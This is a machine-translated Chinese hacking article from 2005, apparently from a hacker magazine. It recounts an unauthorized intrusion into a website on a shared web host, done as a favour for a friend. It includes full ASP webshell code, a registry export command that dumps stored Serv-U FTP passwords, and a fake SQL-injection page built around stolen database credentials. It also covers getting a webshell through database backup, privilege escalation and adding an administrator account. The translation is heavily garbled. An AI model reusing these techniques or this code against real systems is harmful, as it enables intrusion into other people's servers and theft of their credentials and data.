δ½εMYHACK58:6220053005Million network: I come in and play two times-the vulnerability and early warning-the black bar safety net
Article author: Andyower Angel doll
Information source: evil octal information security teamwww.eviloctal.com to
Note: this article has been published 2 0 0 5-year 9-month hacking of Defense. Such as reprint,Please note the name
Recently,a friend said to me to help him get a site,that site has many of his desired information,he gave out the site www.*** d.com,for some reason, so this article has lots of screenshots are not provided,hope you can understanding.
The first penetration
First from the Master Station to start,landing on the go to see,the Master Station of the above are almost always static,only some of the news,and those news Yes the injection point is connected to another one of IP,220.194../ news. asp? id=1 1 1,try to submit and 1=1,and 1=2,There are"news. asp? id=1β1 1",βnews. asp? id=1 1;1β,βnews. asp? id=1 1 1β,βnews. asp? id=1 1β1β,All returns to normal,that is"'β,β;β,βββ,β ",have all been filtered out,then go to 2 2 0. 1 9 4.. Go for a walk,saw a forum,move network,is a few days ago has just Packed up,the number of registrants is less than 5 0 people,in order to avoid each other is a lie,the build date modified,or the latest vulnerability test,can not be successful,want to cross-site? The administrator is not on the forum.
This time,for the www.*** y. com scan report came out,open up 2 1,8 0,3 3 8 9,try ftp on the go look. The return information is as follows:
C:\Documents and Settings\Andyower>ftp www.*** d.com
Connected to [www.tnbfriend.com.] (<http://www.tnbfriend.com./>)
2 2 0-Microsoft FTP for WinSock readyβ¦
2 2 0 (you are welcome to use China million net web hosting, this space prohibit the use of chat rooms, Arena games, online video broadcast
Put, professional download and other serious consumption of the server resources of program,Thank you for your cooperation!)
User (www.tnbfriend.com: to(none)):
The display is the"Microsoft FTP for WinSock ready",samples,βserv-uβ,you think you change the vest I do not know you Ah,the reason is because there is a"2 2 0β,in General,return information"2 2 0", it probably is"serv-u". Is million net virtual host,heard million network the virtual machine is people engage in many times,donβt know now, did not go astray point. First, regardless of this, since it is a virtual host,you almost certainly,certainly can be a side note.
Open Domain3. 5,set the parameters,through a not long out of the results,the above bundled with a lot of websites,look I donβt want to see,purely physical strength to live,thanks to the angel doll,this thing on to her. Let her just find a vulnerable site,get a webshell to say. (Angel doll:why always hurt meβ¦)
Donβt know is because the angel dollβs life better or good character,not to 1 0 minutes,scored a Old State of disrepair of the moving web,and the word Trojan is well written,just waiting for me to connect. I prefer the sea to the top Trojan horse,with play the word very easy to use. Connected up later,saw many of the sites. As shown in Figure 1:!
Just click on a look inside,found no permission,maybe it is for each user to provide an account. Then look at other things,found to be unable to perform cmd,Upload a cmd. exe up,found or unable to perform. Because now I use this Marine is not the latest version,so there is no view component function,in the absence of the view components before,a lot of things are not determined. This time,upload the other one Ocean,the view components. As shown in Figure 2:!
The most important 2 components you can use:Shell. Application ,Wscript. Shell,that is Wscript. The Shell is renamed,but still there,this trifle difficult less than even drops,immediately get the code up,content as follows
<%
fpath = request(βfpathβ)
if request(βcmdβ)<>ββ then
%>
<div align=βcenterβ>
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD=βclsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8β>
</ObjEct>
<textarea readonly cols=8 0 rows=2 0>
<%=Andyower. exec(fpath & " /c "+request(βcmdβ)). stdout. readall%>
</textarea>
Submitted cmd. asp? fpath=their cmd. exe path&cmd=command. As shown in Figure 3!
Now you can run the cmd command,here I want to say about,in the Assembly of the probe,detected the Wscript. Shell does not exist also it may be possible to execute the command. In this Supplement,to finish this article when,suddenly found,in fact,the ocean will directly provide this functionality, just Iβve been useless to. As long as the execution of Wscript. The Shell of the page,Click on use the Wscript. Shell,and then below the command box under the write your own cmd. exe the path of the write up,example:
βf:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat-anβ,this effect and I used the effect is the same. (Thank Lcx brother provide so good with horses).
In netstat-an when. There is a noteworthyβTCP 127.0.0.1:4 3 9 5 8 0.0.0.0:0 LISTENING",and imagine the same,since it is like this,the early ready to of serv-u local privilege elevation program get up,try a few do not succeed,could it be that the password changed? Previously Iβve tried to jump the directory,in the"C:\Documents and Settings\All Users\Start Menu\Programs"find serv-u directory,and download the shortcut,get the path,try to jump to serv-u directory,have tried,can not jump,did limiting. On such give up? Not,of course,can not,do this step, give up a pity. I do not know you remember do not remember 6 months of black-proof,rainy day[F. S. T]to write that article:βserv_u FTP and then storm the local privilege elevation vulnerabilityβ,maybe many people did not notice it,probably because there the limitations are very little,however,I can tell you,the success rate of up to 8 0%,why? Because now the virtual hosts are afraid of the serv-u local privilege escalation vulnerabilities,so,they are the administrator of all the password stored in the registry,that is,in line with the rain of the Astronomical Chapter of the said requirements,the account number and password stored in the registry inside. Donβt remember readers, please re-open the book look. I also donβt want to bullshit so much,directly to see how to achieve it,in the webshell that,execute the command:regedit /e βC:\Documents and Settings\All Users\Documents\system. iniβ βHKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u" ,it will put the registry in the serv-u account password all export to C:\Documents and Settings\All Users\Documents\system. ini this file inside,of course, the premise is:C:\Documents and Settings\All Users\Documents\ this file is writable,if not write the words,their Exchange one can write to the directory. Then download the system. ini File,Open a look! Stay! As shown in Figure 4:!
All of the people the account password are in clear text,here want to say about,because our permissions are Guests,so is no permission to be inside the registry write a single administrator account and password,and in order to prove their own ideas,even also in the machine tested,the Guests,are no permissions to modify the registry or Add Remove. Many approaches have been tried,or not. Jump to c:\winnt\under, compared to KB*. log file,these are the patch logs,the latest patch is yesterday hit,perhaps because of the turn on windows automatic update function,I guess the administrator will not be so diligent.
Now weβve got all the userβs ftp account and password,the key is to find the ftp account password of the corresponding website,but his website, the directory is sequential,from the directory there is no way to guess which directory corresponds to which site,4 0 0 multiple sites! A manual of test words,will make people go crazy. I now take a break. Physical life,let the angel doll come on. (Angel doll:why injured and is Iβ¦) As in get all the ftp account and password how to know which ftp corresponds to which site,I also talk about the bar,first find out the target site of special little web page name,then a personal account password to login,use the ls command to see,is not the presence of that file,if it does not exist on the next,if present,to carefully view the other files,is not have to meet the requirements,there does not exist the siteβs other files. Halo of the bar,itβs okay,examples to explain everything.
First on www.*** d. com website,to find a few special files,in here,I found[http://www.] (<http://www./>)*** d.com/sqrd.htm there[http://www.] (<http://www./>)*** d.com/yuq.htm. εΎε° ζδ»Ά ε,sqrd.htm θΏζ yuq.htm,then from cn23001 This account begins,with the Get account and password landing,landing into the future, found no sqrd. htm file directly jump in the past,if there is a sqrd. htm file,then see if there yuq. the htm file. If there are,description of the lot is probably this ftp account,by the way,also forget to say a little, in the system. ini file inside,important is 2 things. First:[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,the account is cn23017,second:the password is in the following"Passwordβ=here is password,one by one slowly and try it. I went to bed,tired.
Wake Up,Angel doll very depressing for me to say,or did not find,he tried to cn23217,already tired to die,check the Internet search are not related to the software,can not find,forget it,or our great leader Chairman Mao said it Best,do it yourself clothed. Write yourself a program to targeted brute force. Spent some time the program is written,the program interface as below: Figure 5:!
The interface is ugly a bit,because in a hurry?, write a program to spend more than half an hour,and then embellish the words but also to spend a few hours,itβs a waste of time. Can be used can. Say the name,βftp host name"do not say it. Other ftp address, the"special file names"to fill out is to get to the ftp corresponding to the site of the special file name,this has been said in the article name.β From the first couple of ftp account to startβ¦",this place,according to their own requirements to write,because even in the time of the test,sometimes reading to 1 0 0 multiple,the program hangs up,if the restart was too troublesome,so we add this option,to prevent the program to hang, no restart read,and default write 1 on it,meaning the file from the first ftp account to start the test,the other wouldnβt have written it,just waiting for the account out of it. There is little, because in order to save time. Iβm not used to multi-thread,so you automatically jump out of the dialog box to replace a multi-threaded,to prevent the program from deadlock. The next time or is making someone feel good,Iβll improve it. Now this will be the first. The following is my test. As shown in Figure 6:!
I was from the first 4 account to start reading,when the landing of the ftp in the presence of the index. asp this file,it will put the account and password are then listed,easy. Here perhaps someone will ask,just in case there are several websites are there the same special file name? Oh,this time,you need to own move your hand., can not be so lazy.
Within a few minutes,have the test done,wherein an account there I write the special file name,just him. Manually ftp to look inside,is this site, free samples, www.*** d.com you thought you hid the deep I canβt find you! Haha! Like let you get away! the ls command see the. Find a conn. asp file,open to see, since it is in addition a host connection information:
<%
dim conn
dim connstr
connstr=βprovider=sqloledb;driver={SQL SERVER};server=220.194..; uid=j****;pwd=d******;database=d*****;β
set conn=server. createobject(βADODB. CONNECTIONβ)
conn. open connstr
%>
Re penetration
This times a million network kill people! Now let me get to attack the website of another server. 2 2 0. 1 9 4.., This server is a separate,side note over,without success,because there is no another website,this time,see you where to run,put together he scored! Because of some reasons,from now on does not provide a screenshot,hope you can understanding. Now that youβve got the database account password,and his website is directly with asp to connect up, so to speak,a certain will open up the ms sql ports. With a sql connection on the go,find yourself the permission is db_owner permissions, a lot of command can not use, their hand read to go to the other side of the web path and too much trouble,and I also want to take a look at his structure,since I have the sql account password. Heβs on the server there is no injection vulnerability,I can help him forge one,forge one injection point, and then use nbsi to guess the other information,the speed will be much faster.
Even immediately in the local set up an IIS,then put his conn. the asp file to get my virtual directory. Then construct a presence of the injection point of the file a. asp,inside the admin table is there,the code is as follows:
<!β# include file=βconn. aspβ - >
<%
dim rs,strSQL,id
set rs=server. createobject(βADODB. recordsetβ)
id = request(βidβ)
strSQL = βselect * from admin where id=β & id 'if not this table,you can build a table and field
rs. open strSQL,conn,1,3
rs. close
%>
Done,so simple,other information, let him all of yourself exposed. Open nbsi,a crazy note,what information are out now,slowly browse his directory,web directory in d:\wwww,also installed serv-u,this server because it is their own, so not so professional., should not be provided what Defense. First get webshell to say,the db_owner permissions to the BACKUP DATABASE,ζ η¨ xiaolu η getwebshell.exe,Backup Database Files to the d:\www\1. asa,the results can not run! Error! The original fucking exist in the database<% this thing,no way, luck has always been not very good,this is a very good reason. Slowly to find the database to see which fields exist<%of the content,delete!
Spent another half an hour to find out, with an SQL statement to put him to delete,the backup again,this time successfully. The success of the Get webshell,but doesnβt look good, re-write a webshell go in,then was serv-u is elevated,add an account,set to administrator,3 3 8 9 log into it,cool dead! What are with, the account password to a friend?, he loves how the hell are his things,my task has been completed.